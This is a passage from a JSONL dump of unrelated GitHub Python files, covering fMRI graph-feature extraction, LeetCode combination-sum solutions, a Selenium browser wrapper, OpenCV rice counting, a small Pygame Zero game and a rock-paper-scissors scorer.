return\n\n\nrun()\n\nprint(book_store)\n\n","repo_name":"rafalacerda1530/Python","sub_path":"atividades/Atividades_de_treino/Atividade Livraria.py","file_name":"Atividade Livraria.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31923385135","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jun 1 09:52:17 2020\r\n\r\n@author: mmousa4\r\n\"\"\"\r\n##referenec: https://brainiak.org/events/ohbm2018/brainiak_sample_tutorials/09-fcma.html#connectome\r\n##reference: https://brainiak.org/events/ohbm2018/brainiak_sample_tutorials/09-fcma.html#connectome\r\n\r\n\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport networkx as nx\r\n\r\ndef CreateGraph(edges):\r\n# edges = correlations_ICA[i,:,:]\r\n G = nx.Graph()\r\n #, coords_connectome\r\n epoch_corr = edges\r\n # What is the (absolute) correlation threshold\r\n threshold = 0.129\r\n \r\n nodelist = []\r\n edgelist = []\r\n \r\n #Normalized [0,1]\r\n edges = (edges-np.min(edges))/(np.max(edges)-np.min(edges))\r\n \r\n \r\n for row_counter in range(epoch_corr.shape[0]):\r\n nodelist.append(str(row_counter)) # Set up the node names\r\n \r\n for col_counter in range(epoch_corr.shape[1]):\r\n \r\n # Determine whether to include the edge based on whether it exceeds the threshold\r\n if abs(epoch_corr[row_counter, col_counter]) > threshold:\r\n # Add a tuple specifying the voxel pairs being compared and the weight of the edge\r\n edgelist.append((str(row_counter), str(col_counter), {'weight': epoch_corr[row_counter, col_counter]}))#1}))#\r\n #weight = 1: for binary Graph , binarized, undirected graph\r\n # Create the nodes in the graph\r\n G.add_nodes_from(nodelist)\r\n \r\n # Add the edges\r\n G.add_edges_from(edgelist)\r\n \r\n #remove self loops \r\n G.remove_edges_from(nx.selfloop_edges(G))\r\n# print (edgelist)\r\n# nx.draw(G)\r\n return G\r\n\r\n\r\n\r\n#%%\r\n#reference: https://whitakerlab.github.io/scona/_modules/scona/graph_measures.html\r\ndef calc_nodal_partition(G):\r\n '''\r\n Calculate a nodal partition of G using the louvain algorithm as\r\n iBrainNetworkommunity.best_partition`\r\n\r\n Note that this is a time intensive process and it is also\r\n non-deterministic, so for consistency and speed it's best\r\n to hold on to your partition.\r\n\r\n Parameters\r\n ----------\r\n G : :class:`networkx.Graph`\r\n A binary graph\r\n\r\n Returns\r\n -------\r\n (dict, dict)\r\n Two dictionaries represent the resulting nodal partition of G. The\r\n first maps nodes to modules and the second maps modules to nodes.\r\n '''\r\n import community\r\n # Make sure the edges are binarized\r\n for u, v, d in G.edges(data=True):\r\n if d.get('weight', 1) != 1:\r\n raise ValueError(\"G should be a binary graph\")\r\n # Now calculate the best partition\r\n nodal_partition = community.best_partition(G)\r\n\r\n # Reverse the dictionary to record a list of nodes per module, rather than\r\n # module per node\r\n module_partition = {}\r\n for n, m in nodal_partition.items():\r\n try:\r\n module_partition[m].append(n)\r\n except KeyError:\r\n module_partition[m] = [n]\r\n\r\n return nodal_partition, module_partition\r\n\r\n\r\n \r\ndef participation_coefficient(graph, partition):\r\n \"\"\"\r\n Computes the participation coefficient for each node.\r\n\r\n ------\r\n Inputs\r\n ------\r\n graph = networkx graph\r\n partition = modularity partition of graph\r\n\r\n ------\r\n Output\r\n ------\r\n List of the participation coefficient for each node.\r\n\r\n \"\"\"\r\n# graph, partition = graph,module_partition\r\n pc_dict = {}\r\n all_nodes = set(graph.nodes())\r\n paths = dict(nx.shortest_path_length(G=graph))\r\n for m in partition.keys():\r\n mod_list = set(partition[m])\r\n between_mod_list = list(set.difference(all_nodes, mod_list))\r\n for source in mod_list:\r\n degree = float(nx.degree(G=graph, nbunch=source))\r\n count = 0\r\n for target in between_mod_list:\r\n if source in paths and target in paths[source] and paths[source][target] == 1:\r\n count += 1\r\n bm_degree = count\r\n pc = 1 - (bm_degree / degree) ** 2 if degree !=0 else 0\r\n pc_dict[source] = pc\r\n return pc_dict\r\n\r\n#%%\r\n#10 local and 13 global graph measures were\r\n#calculated based on rs-fMRI adjacency matrix. The local graph\r\n#measures were betweenness centrality, clustering coefficient,\r\n#characteristic path, community structure Newman (CSN), community\r\n#structure Louvain (CSL), eigenvector centrality, rich club\r\n#coefficient, sub graph centrality, eccentricity,and participation coefficient?\r\n#(45). \r\n#The average shortest path length between all pairs of nodes in thenetwork is known as thecharacteristic path lengthof the network(e.g.,Watts and Strogatz, 1998) \r\n#The node eccentricity is the maximal shortest path length between a node and any other node\r\n \r\nfrom networkx import algorithms\r\nfrom community import community_louvain\r\nfrom community import best_partition #conda install -c conda-forge python-louvain (amaconda prompt)\r\nfrom networkx.algorithms.shortest_paths.unweighted import all_pairs_shortest_path_length\r\nfrom networkx.algorithms.distance_measures import eccentricity\r\n\r\n#reference: 2017_wang et al _Depression Disorder Classification of fMRI Data Using Sparse.pdf\r\n# In this paper, eight graph-based features are computed from the following four aspects:\r\n# functional segregation (Clustering coefficient,Local efficiency), \r\n# functional integration (Characteristic path length, global efficiency ), \r\n# nodal centrality (Degree and betweenness centrality), and \r\n# network resilience\r\ndef feature_vector2(G):\r\n # 4 local + 3 Global\r\n# G=graph\r\n featureVector=[]\r\n \r\n #functional segregation (Clustering coefficient,Local efficiency)\r\n #-----------------------------------\r\n #Clustering coefficient\r\n glm_l_clusteringCoefficient= nx.clustering(G)\r\n \r\n #Local efficiency\r\n glm_g_local_efficiency = nx.algorithms.efficiency_measures.local_efficiency(G)\r\n \r\n #functional integration (Characteristic path length, global efficiency )\r\n #----------------------------------\r\n #Characteristic path length\r\n if nx.is_connected(G):\r\n glm_g_characteristicPath= nx.average_shortest_path_length(G)\r\n else:\r\n glm_g_characteristicPath = 0\r\n \r\n #global efficiency\r\n glm_g_global_efficiency = nx.global_efficiency(G)\r\n \r\n \r\n #Nodal centrality (Degree and betweenness centrality)\r\n #----------------------------------\r\n #Degree\r\n glm_l_degree = G.degree\r\n degreelist = [d for n, d in G.degree()]\r\n glm_l_degree = dict(zip(range(0,len(degreelist)), degreelist)) \r\n #Betweenness centrality\r\n glm_l_betweennessCentrality=nx.betweenness_centrality(G,normalized=True)\r\n \r\n #Participation coefficient\r\n nodal_partition, module_partition= calc_nodal_partition(G)\r\n glm_l_pp =participation_coefficient (G,module_partition)\r\n #Network Resilience\r\n #-----------------------------------\r\n glm_l_average_neighbor_degree = nx.average_neighbor_degree(G)\r\n \r\n #Once we have obtained all the eight graph-based features, we concatenate them to construct the final feature vectors.\r\n #Specifically, for each subject, the feature vector has a size of 698, which consists of 116 ∗ 6 local measures and 2 global ones.\r\n featureVector=list(glm_l_clusteringCoefficient.values())\r\n# featureVector = featureVector + list(glm_l_local_efficiency)\r\n featureVector = featureVector + list(glm_l_degree.values())\r\n featureVector = featureVector + list(glm_l_betweennessCentrality.values())\r\n featureVector = featureVector + list(glm_l_average_neighbor_degree.values())\r\n featureVector = featureVector + list(glm_l_pp.values())\r\n \r\n featureVector.append(glm_g_characteristicPath if nx.is_connected(G) else 0)\r\n featureVector.append(glm_g_global_efficiency)\r\n featureVector.append(glm_g_local_efficiency)\r\n \r\n# fv_columns = []\r\n fv_columns = [str(x) + 'clusteringCoefficient' for x in list(glm_l_clusteringCoefficient.keys())] \r\n# fv_columns = fv_columns + [str(x) + 'local_efficiency' for x in list(glm_l_local_efficiency.keys())] \r\n fv_columns = fv_columns + [str(x) + 'nodeDegree' for x in list(glm_l_degree.keys())]\r\n fv_columns= fv_columns +[str(x) + 'betweennessCentrality' for x in list(glm_l_betweennessCentrality.keys())] \r\n fv_columns = fv_columns + [str(x) + 'average_neighbor_degree' for x in list(glm_l_average_neighbor_degree.keys())]\r\n fv_columns = fv_columns + [str(x) + 'participation_coefficient' for x in list(glm_l_pp.keys())]\r\n \r\n fv_columns = fv_columns + ['characteristicPath','global_efficiency','local_efficiency']\r\n print(\"featureVector.length:\",featureVector.count)\r\n print(fv_columns)\r\n return featureVector , fv_columns\r\n \r\ndef feature_vector(G):\r\n #6 local and 8 global graph measures were computed that resultedin 913 features\r\n# G=graph\r\n featureVector=[]\r\n #Local measures\r\n #--------------\r\n glm_l_betweennessCentrality=nx.betweenness_centrality(G) #1.betweenness centrality (defined as the fraction of all shortest paths in the network that pass through a given node.)\r\n glm_l_clusteringCoefficient= nx.clustering(G)#2.clustering coefficient(cc)\r\n# glm_l_characteristicPath = dict(nx.all_pairs_shortest_path_length(G)) #3.characteristic path\r\n #3. The average shortest path length between all pairs of nodes in the network is known as the characteristic path length of the network\r\n glm_l_csn = nx.algorithms.community.girvan_newman(G) #4.community structure Newman (CSN)\r\n glm_l_csn = tuple(sorted(c) for c in next(glm_l_csn))\r\n #glm_l_csl =community_louvain.best_partition(G) #5.community structure Louvain (CSL) # use community of 'python-louvain' vs 'networkx.algorithms.community' \r\n glm_l_evcentrality = nx.eigenvector_centrality(G) #6.eigenvector centrality\r\n glm_l_richClubCoef = nx.rich_club_coefficient(G, normalized=False)#7.rich_club_coefficient is not implemented for graphs with self loops.\r\n glm_l_subGraphCentrality = nx.algorithms.centrality.subgraph_centrality(G) #8.sub graph centrality\r\n if nx.is_connected(G):\r\n glm_l_eccentricity = eccentricity(G) #9.eccentricity\r\n glm_g_characteristicPath= float(nx.average_shortest_path_length(G))#3.characteristic path\r\n glm_g_diameter = nx.diameter(G)#9.graph diameter\r\n glm_g_smallworld_sigma = nx.algorithms.smallworld.sigma(G)#11.small-worldness\r\n\r\n \r\n #The global graph measures were assortativity, clustering\r\n #coefficient, characteristic path, community structure Newman\r\n #output, community structure Louvain output, cost efficiency\r\n #(two measures), density, efficiency, graph radius, graph diameter,\r\n #transitivity, and small-worldness (45).\r\n #The global efficiency is the average inverse shortest path length in the network\r\n #The global cost efficiency is then defined as the global efficiency at a given cost minus the cost,i.e.,(E\tC),which will typically have a maximum value max(E\tC)\u00040,atsomecostCmax,foraneconomicalsmall-worldnetwork.Likewise,the regionalcostefficiencywascalculatedasthemaximumofthefunction(E(i)\tk),wherekisthedegreeornumberofedgesconnectingtheith\r\n #Global measures\r\n #--------------\r\n# glm_g_degree_assortativity_coef = nx.algorithms.assortativity.degree_assortativity_coefficient(G) # 1.assortativity\r\n glm_g_clusteringCoefficient=nx.average_clustering(G) #2.Global Clustering Coefficient (CC)\r\n #4.community structure Newman output\r\n #5.community structure Louvain output\r\n# glm_g_globalCostEfficiency = glm_g_global_efficiency - #6.cost efficiency(two measures)\r\n #GCE=E - PSW, Where Ei is the efficiency of node i, N is the set of all nodes in the network, n is the number of nodes and di j is the shortest path length (distance) between nodes i and j\r\n glm_g_density = nx.density(G)#7.density\r\n glm_g_global_efficiency = nx.global_efficiency(G)#8.efficiency \r\n \r\n glm_g_transitivity= nx.transitivity(G)#10.transitivity\r\n glm_g_radius = nx.radius(G)#12.graph radius\r\n\r\n \r\n featureVector=list(glm_l_betweennessCentrality.values())\r\n featureVector = featureVector + list(glm_l_clusteringCoefficient.values())\r\n# featureVector = featureVector + list(glm_l_characteristicPath.values())\r\n featureVector = featureVector + list(glm_l_evcentrality.values())\r\n featureVector = featureVector + list(glm_l_richClubCoef.values())\r\n featureVector = featureVector + list(glm_l_subGraphCentrality.values())\r\n featureVector = featureVector + list(glm_l_eccentricity.values())\r\n \r\n# featureVector.append(glm_g_degree_assortativity_coef)\r\n featureVector.append(glm_g_clusteringCoefficient)\r\n featureVector.append(glm_g_characteristicPath)\r\n featureVector.append(glm_g_density)\r\n featureVector.append(glm_g_global_efficiency)\r\n featureVector.append(glm_g_diameter)\r\n featureVector.append(glm_g_transitivity)\r\n featureVector.append(glm_g_smallworld_sigma)\r\n featureVector.append(glm_g_radius)\r\n \r\n \r\n# fv_columns = []\r\n fv_columns= [str(x) + 'betweennessCentrality' for x in list(glm_l_betweennessCentrality.keys())] \r\n fv_columns = fv_columns + [str(x) + 'clusteringCoefficient' for x in list(glm_l_clusteringCoefficient.keys())] \r\n# fv_columns = fv_columns + list(glm_l_characteristicPath.values())\r\n fv_columns = fv_columns + [str(x) + 'evcentrality' for x in list(glm_l_evcentrality.keys())] \r\n fv_columns = fv_columns + [str(x) + 'richClubCoef' for x in list(glm_l_richClubCoef.keys())] \r\n fv_columns = fv_columns + [str(x) + 'subGraphCentrality' for x in list(glm_l_subGraphCentrality.keys())] \r\n fv_columns = fv_columns + [str(x) + 'eccentricity' for x in list(glm_l_eccentricity.keys())] \r\n fv_columns = fv_columns + ['clusteringCoefficient','characteristicPath','density','global_efficiency','diameter','transitivity','smallworld','radius']\r\n print(\"featureVector.length:\",featureVector.count)\r\n print(fv_columns)\r\n return featureVector , fv_columns#'degree_assortativity_coef',\r\n#%%\r\nimport os \r\n\r\n#np.load.__defaults__=(None, False, True, 'ASCII')\r\nnp_load_old = np.load\r\nnp.load = lambda *a,**k: np_load_old(*a, allow_pickle=True, **k)\r\n#np.load = lambda *a,**k: np_load_old(*a,allow_pickle=True)\r\n\r\n#os.chdir('C:\\\\Users\\\\mmousa4\\\\OneDrive - Louisiana State University\\\\Final_codes\\\\Sections\\\\NewResults')\r\n#train_feature= np.load('ExpandfMRI_UNET2D_VGG162D.npy')\r\n#final_labels_train_3d = np.load('final_labels_train_3d.npy')\r\n#\r\n#corr_den= np.load('corr_den.npy')\r\n#from nilearn.connectome import GroupSparseCovarianceCV,sym_matrix_to_vec,ConnectivityMeasure\r\n#connectivities = sym_matrix_to_vec(corr_den, discard_diagonal=True)\r\n#final_labels = np.load('final_labels.npy')\r\n\r\n#ts_canica = np.load('ts_canica.npy')\r\n#covariences= np.load('canica_GL_covariences.npy')\r\nprefix = 'aal_corr_den'\r\nfrom nilearn.connectome import GroupSparseCovarianceCV,sym_matrix_to_vec,ConnectivityMeasure\r\ncorrelations= np.load(prefix+'.npy')\r\n\r\n#connectivities = sym_matrix_to_vec(covariences, discard_diagonal=True)\r\n#final_labels = np.load('final_labels.npy')\r\n#ind = np.load('indx_rus_9_646431.npy')\r\n#connectivities=connectivities[ind]\r\n##final_labels=final_labels[ind]\r\n#covariences = covariences[ind]\r\n#%%\r\n#correlations=np.array(cov,dtype='float16') \r\n#correlations= corr_den\r\n#correlations=covariences\r\n\r\nfv_list=[]\r\n#nNodes = []\r\ndf = pd.DataFrame()\r\n\r\nfor i in range (0,correlations.shape[0]):\r\n \r\n graph = CreateGraph(correlations[i,:,:])\r\n# print(graph)\r\n fv,column = feature_vector2(graph)\r\n df1 = pd.DataFrame([fv], columns =list(column)) \r\n df = df.append(df1, sort = False)\r\ndf = df.reset_index(drop=True)\r\ngraphFeatures = df.values\r\n\r\n#df.to_csv('graphdf_canica.csv')\r\n#np.save('graphFeatures_canica.npy',np.array(graphFeatures,dtype='float16'))\r\n#np.save('graphFeatures_SpectrumDensity.npy',np.array(graphFeatures,dtype='float16'))\r\nnp.save(prefix+'graphFeatures.npy',np.array(graphFeatures,dtype='float16'))\r\n\r\n","repo_name":"moosavianmz/DetectingDepression","sub_path":"Workflow/2-Feature Extraction/4-1-GraphFeatures.py","file_name":"4-1-GraphFeatures.py","file_ext":"py","file_size_in_byte":15984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36763117373","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Problem\n# \n# Given a collection of candidate numbers (candidates) and a target number (target), find all unique combinations in candidates where the candidate numbers sums to target. Each number in candidates may only be used once in the combination.\n# \n# Note:\n# - All numbers (including target) will be positive integers.\n# - The solution set must not contain duplicate combinations.\n# \n# Example 1:
    \n# Input: candidates = [10,1,2,7,6,1,5], target = 8,
    \n# A solution set is:
    \n# [\n# [1, 7],\n# [1, 2, 5],\n# [2, 6],\n# [1, 1, 6]\n# ]\n# \n# Example 2:
    \n# Input: candidates = [2,5,2,1,2], target = 5,
    \n# A solution set is:
    \n# [\n# [1,2,2],\n# [5]\n# ]\n\n\n# Solution 1\n# dfs using list slicing\nclass Solution:\n def combinationSum2(self, candidates: List[int], target: int) -> List[List[int]]:\n if not candidates:\n return []\n \n candidates.sort()\n \n result = []\n temp_list = []\n self.helper(candidates, temp_list, result, target)\n return result\n \n def helper(self, candidates, temp_list, result, target):\n \n if sum(temp_list) == target:\n result.append(temp_list)\n return\n \n elif sum(temp_list) < target:\n for i, candidate in enumerate(candidates):\n if candidates[i] == candidates[i-1] and i != 0:\n continue\n else:\n self.helper(candidates[i+1:], temp_list+[candidate], result, target)\n \n else:\n return\n \n \n# Solution 2\n# dfs using indices\nclass Solution:\n def combinationSum2(self, candidates: List[int], target: int) -> List[List[int]]:\n \n candidates.sort()\n all_subsets = []\n subset = []\n start_index = 0\n return self.helper(candidates, target, start_index, subset, all_subsets)\n \n def helper(self, candidates, target, start_index, subset, all_subsets):\n \n if sum(subset) > target:\n return\n elif sum(subset) == target:\n all_subsets.append(subset)\n return\n \n for i in range(start_index, len(candidates)):\n if candidates[i] == candidates[i-1] and i > start_index:\n continue\n \n self.helper(candidates, target, i+1, subset+[candidates[i]], all_subsets)\n \n return all_subsets\n\n\n# Solution 3: Backtracking\n\ndef combination_sum2_backtrack(candidates, target):\n subsets = []\n candidates.sort(reverse=True)\n backtrack(candidates, target, 0, [], subsets)\n return subsets\n\ndef backtrack(candidates, target, start, templist, subsets):\n if target == 0:\n subsets.append(templist[:])\n \n elif target > 0:\n for i in range(start, len(candidates)):\n if i > start and candidates[i] == candidates[i-1]:\n continue\n templist.append(candidates[i])\n backtrack(candidates, target-candidates[i], i+1, templist, subsets)\n templist.pop() \n\n\n# # Solution 4: bottom up dynamic programming\n\ndef combinationSum2(self, candidates: List[int], target: int) -> List[List[int]]:\n candidates.sort()\n aux = [set() for i in range(target + 1)]\n aux[0].add(())\n for candidate in candidates:\n for subtarget in range(target, candidate - 1, -1):\n for prev in aux[subtarget - candidate]:\n aux[subtarget].add(prev + (candidate,))\n return list(aux[-1])\n\n","repo_name":"shanminlin/Leetcode","sub_path":"array/permutation_combination/40_Combination_Sum_II.py","file_name":"40_Combination_Sum_II.py","file_ext":"py","file_size_in_byte":3551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"4772873327","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time : 2020/7/11\n# @Author : Mik\nfrom typing import Union, Type\nfrom selenium.webdriver import *\nfrom selenium.webdriver.opera.options import Options as OperaOptions\nfrom selenium.webdriver.edge.options import Options as EdgeOptions\nfrom setting import *\nfrom utils.logs import logger\n\n# 自定义异常参数\nBROWSERS = (Chrome, Ie, Firefox, Edge, Opera, Safari)\nOPTIONS = (ChromeOptions, IeOptions, FirefoxOptions, EdgeOptions, OperaOptions)\n\n\nclass BrowserTypeError(Exception):\n \"\"\"\n 自定义异常类\n \"\"\"\n\n def __init__(self, _type):\n self._type = _type\n\n def __str__(self):\n return f'Unsupported browser parameters:{self._type}'\n\n\nclass Browser:\n # 浏览器驱动路径\n REMOTE_EXECUTOR = COMMAND_REMOTE_EXECUTOR\n CHROME_DRIVER_PATH = CHROME_DRIVER_PATH\n FIREFOX_DRIVER_PATH = FIREFOX_DRIVER_PATH\n EDGE_DRIVER_PATH = EDGE_DRIVER_PATH\n OPERA_DRIVER_PATH = OPERA_DRIVER_PATH\n IE_DRIVER_PATH = IE_DRIVER_PATH\n\n # 启动grid配置\n\n def __init__(self, browser_type: Type[Union[Chrome, Ie, Firefox, Edge, Opera, Safari]] = Chrome,\n option_type: Type[\n Union[FirefoxOptions, ChromeOptions, IeOptions, EdgeOptions, OperaOptions]] = ChromeOptions,\n driver_path: str = CHROME_DRIVER_PATH):\n if not issubclass(browser_type, BROWSERS): # 异常处理\n raise BrowserTypeError(browser_type) # TypeError\n if not issubclass(option_type, OPTIONS):\n raise BrowserTypeError(option_type)\n if not isinstance(driver_path, str):\n raise TypeError\n self._driver = browser_type\n self._option = option_type\n self._path = driver_path\n self._remote = Remote\n\n\nclass MyChrome(Browser):\n\n def __init__(self, grid):\n self.GRID_MARK = grid\n super(MyChrome, self).__init__(\n )\n\n @property\n def _option1(self):\n \"\"\"\n chrome浏览器特有的操作属性\n :return:\n \"\"\"\n prefs = {\n \"credentials_enable_service\": False,\n \"profile.password_manager_enabled\": False,\n \"profile.default_content_settings.popups\": 0 # 禁用下载弹窗\n }\n\n chrome_experimental = {\n # 'mobileEmulation': {'deviceName': 'iPhone 6'}, # 设置手机模式\n 'excludeSwitches': ['enable-automation'], # 反爬设置\n }\n\n chrome_option = self._option() # 获取chrome_option实例\n chrome_option.headless = False\n chrome_option.add_argument('--disable-gpu') # 禁bug,谷歌推荐参数\n chrome_option.add_argument('--ignore-certificate-errors') # 禁用ssl证书\n chrome_option.add_experimental_option(\"prefs\", prefs)\n for k, v in chrome_experimental.items():\n chrome_option.add_experimental_option(k, v)\n return chrome_option\n\n def browser(self, option_id: int):\n \"\"\"\n 启动chrome浏览器进行初始配置\n :return:\n \"\"\"\n if option_id == 0:\n option = None\n elif option_id == 1:\n option = self._option1\n else:\n raise ValueError('Option id error')\n\n if self.GRID_MARK: # 判断是否启动GRID\n chrome = self._remote(command_executor=self.REMOTE_EXECUTOR,\n desired_capabilities=DesiredCapabilities.CHROME.copy(),\n options=option)\n else:\n chrome = self._driver(executable_path=self._path, options=option)\n chrome.maximize_window()\n return chrome\n\n\nclass IE(Browser):\n\n def __init__(self, grid):\n self.GRID_MARK = grid\n super(IE, self).__init__(\n browser_type=Ie,\n option_type=IeOptions,\n driver_path=super().IE_DRIVER_PATH\n\n )\n\n @property\n def _option1(self):\n \"\"\"\n ie浏览器特有的操作属性\n :return:\n \"\"\"\n ie_option = self._option()\n ie_option.browser_attach_timeout = 10000 # ie页面超时时间\n ie_option.ensure_clean_session = True # ie浏览器清空本地会话\n return ie_option\n\n def browser(self, option_id: int):\n \"\"\"\n 启动ie浏览器并进行初始配置\n :return:\n \"\"\"\n if option_id == 0:\n option = None\n elif option_id == 1:\n option = self._option1\n else:\n raise ValueError('Option id error')\n\n if self.GRID_MARK:\n ie = self._remote(command_executor=self.REMOTE_EXECUTOR,\n desired_capabilities=DesiredCapabilities.INTERNETEXPLORER.copy(),\n options=option)\n else:\n ie = self._driver(executable_path=self._path, options=option)\n\n ie.maximize_window()\n return ie\n\n\nclass MyFirefox(Browser):\n\n def __init__(self, grid):\n self.GRID_MARK = grid\n super(MyFirefox, self).__init__(\n browser_type=Firefox,\n option_type=FirefoxOptions,\n driver_path=super().FIREFOX_DRIVER_PATH\n )\n\n @property\n def _option1(self):\n \"\"\"\n firefox浏览器特有的操作属性\n :return:\n \"\"\"\n firefox_option = self._option() # 获取chrome_option实例\n firefox_option.headless = False\n return firefox_option\n\n def browser(self, option_id: int):\n \"\"\"\n 启动firefox浏览器并进行初始配置\n :return:\n \"\"\"\n if option_id == 0:\n option = None\n elif option_id == 1:\n option = self._option1\n else:\n raise ValueError('Option id error')\n\n if self.GRID_MARK: # 判断是否启动GRID\n firefox = self._remote(command_executor=self.REMOTE_EXECUTOR,\n desired_capabilities=DesiredCapabilities.FIREFOX.copy(),\n options=option)\n else:\n firefox = self._driver(executable_path=self._path, options=option,\n service_log_path=FIREFOX_SERVICE_LOG_PATH)\n\n firefox.maximize_window()\n return firefox\n\n\nclass MyEdge(Browser):\n\n def __init__(self, grid):\n self.GRID_MARK = grid\n super(MyEdge, self).__init__(\n browser_type=Edge,\n option_type=EdgeOptions,\n driver_path=super().EDGE_DRIVER_PATH\n )\n\n @property\n def _option1(self):\n \"\"\"\n ie浏览器特有的操作属性\n :return:\n \"\"\"\n edge_option = self._option()\n edge_option.page_load_strategy = 'normal'\n return edge_option\n\n def browser(self, option_id):\n \"\"\"\n 启动edge浏览器并进行初始配置\n :return:\n \"\"\"\n if option_id == 0:\n option = None\n elif option_id == 1:\n option = self._option1\n else:\n raise ValueError('Option id error')\n\n if self.GRID_MARK:\n edge = self._remote(command_executor=self.REMOTE_EXECUTOR,\n desired_capabilities=DesiredCapabilities.EDGE.copy(),\n options=option)\n else:\n edge = self._driver(executable_path=self._path, options=option)\n\n edge.maximize_window()\n return edge\n\n\nclass MySafari(Browser):\n\n def __init__(self, grid):\n self.GRID_MARK = grid\n super(MySafari, self).__init__(\n browser_type=Safari,\n )\n\n @property\n def browser(self):\n \"\"\"\n 启动edge浏览器并进行初始配置\n :return:\n \"\"\"\n if self.GRID_MARK:\n safari = self._remote(command_executor=self.REMOTE_EXECUTOR,\n desired_capabilities=DesiredCapabilities.SAFARI.copy())\n else:\n safari = self._driver()\n safari.maximize_window()\n return safari\n","repo_name":"lztzl/project1","sub_path":"common/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":8003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"34574791703","text":"import pickle\nimport struct\nimport msgpack\n\n\ndef read_data(input_path: str, save_set: bool = True):\n with open(input_path, 'rb') as file:\n data = list(file.read())\n\n data_set = set(data) if save_set else None\n return data, data_set\n\n\ndef write_data(output_path: str, data: list) -> None:\n with open(output_path, 'wb') as f:\n for item in data:\n f.write(item.to_bytes(1, 'big'))\n\n# def write_encoded_data(output_path: str, obj)->None:\n# with open(output_path, \"wb\") as f:\n# pickle.dump(obj, f)\n\n\ndef write_encoded_data(output_path: str, data: list, data_set: list = None) -> None:\n\n packed_data = bytearray(b''.join(struct.pack(' 100: # Eşik değeri ile oynayarak pirinç tanelerini belirlenebilir\r\n pirinc_sayisi += 1\r\n cv2.drawContours(frame, [kontur], -1, (0, 255, 0), 2)\r\n\r\n print(f\"Pirinç Taneleri Sayısı: {pirinc_sayisi}\")\r\n\r\n return frame\r\n\r\n# Kamerayı açma\r\nvideo_capture = cv2.VideoCapture(0)\r\n\r\nwhile True:\r\n # Bir sonraki kareyi al\r\n ret, frame = video_capture.read()\r\n\r\n if not ret:\r\n break\r\n\r\n # Pirinç tanelerini sayan fonksiyonu çağır\r\n sonuc_frame = say_pirinc_taneleri(frame)\r\n\r\n # Sonucu göster\r\n cv2.imshow('Pirinç Sayım', sonuc_frame)\r\n\r\n # 'q' tuşuna basılınca döngüden çık\r\n tus = cv2.waitKey(1) & 0xFF\r\n if tus == ord('q'):\r\n break\r\n\r\n# Kamerayı kapat\r\nvideo_capture.release()\r\ncv2.destroyAllWindows()\r\n\r\n","repo_name":"ayseck/Goruntu_Isleme","sub_path":"pirinc taneleri hesaplama/pirinc_hesaplama.py","file_name":"pirinc_hesaplama.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2368368497","text":"import pgzrun\nimport random\n\nWIDTH = 800\nHEIGHT = 800\n\nkolory = [\"#A3DDCB\", \"#E8E9A1\", \"#E6B566\", \"#E5707E\"]\n\npilka = {\"x\": WIDTH / 2, \"y\": HEIGHT - 30, \"promien\": 10, \"vy\": 0, \"kolor\": random.choice(kolory)}\n\nlinie = []\n\n\ndef draw():\n screen.fill((0, 0, 0))\n\n pilka_rect = Rect((pilka[\"x\"], pilka[\"y\"]), (pilka[\"promien\"] * 2, pilka[\"promien\"] * 2))\n\n for linia in linie:\n for i in range(len(linia[\"segmenty\"])):\n kolor = linia[\"segmenty\"][i]\n szer = WIDTH / 4\n x = i * szer - linia[\"przes\"]\n y = linia[\"y\"]\n segment = Rect((x, y), (szer, 20))\n screen.draw.filled_rect(segment, kolor)\n\n if segment.colliderect(pilka_rect) and kolor != pilka[\"kolor\"]:\n reset()\n\n screen.draw.filled_circle((pilka[\"x\"], pilka[\"y\"]), pilka[\"promien\"], pilka[\"kolor\"])\n\n\ndef dodaj_linie(y):\n linia = {}\n linia[\"segmenty\"] = kolory[:]\n random.shuffle(linia[\"segmenty\"])\n linia[\"segmenty\"].extend(linia[\"segmenty\"])\n linia[\"przes\"] = 0\n linia[\"vx\"] = random.randint(2, 5)\n linia[\"y\"] = y\n linie.append(linia)\n\n\ndef update():\n global przes\n for linia in linie:\n linia[\"przes\"] += linia[\"vx\"]\n if linia[\"przes\"] >= WIDTH:\n linia[\"przes\"] = 0\n\n pilka[\"vy\"] += 0.5\n pilka[\"y\"] += pilka[\"vy\"]\n\n\ndef on_key_down(key):\n global linia_y\n if key == keys.SPACE:\n pilka[\"vy\"] = -10\n przesun()\n\n\ndef przesun():\n for linia in linie[:]:\n linia[\"y\"] += 20\n if linia[\"y\"] > HEIGHT:\n dodaj_linie(0)\n linie.remove(linia)\n\n\ndef reset():\n global pilka\n linie.clear()\n dodaj_linie(WIDTH / 2)\n dodaj_linie(WIDTH / 5)\n dodaj_linie(-80)\n pilka = {\"x\": WIDTH / 2, \"y\": HEIGHT - 30, \"promien\": 15, \"vy\": 0, \"kolor\": random.choice(kolory)}\n\n\nreset()\npgzrun.go()\n","repo_name":"blackbat13/UniwersytetMlodych","sub_path":"Spotkanie 15/gra2.py","file_name":"gra2.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"44062236093","text":"import structlog\n\nlogger = structlog.get_logger()\n\n\n\"\"\"\nRules:\n A: rock\n B: paper\n C: scissors\n\nA < B < C < A...\n\nMy side:\n X: rock\n Y: paper\n Z: scissors\n\"\"\"\n\n\ndef read_file(name):\n with open(name, \"r\") as file:\n lines = file.readlines()\n return lines\n\n\nclass Turn:\n def __init__(self, line: str):\n self.opponent = line.split(\" \")[0]\n self.myself = line.split(\" \")[1].strip()\n\n def fight(self):\n if self.myself == \"Y\":\n return 3\n elif self.myself == \"Z\":\n return 6\n else:\n return 0\n\n def score(self):\n fight_score = self.fight()\n self_score = 0\n if self.opponent == \"A\":\n if fight_score == 3:\n self_score = 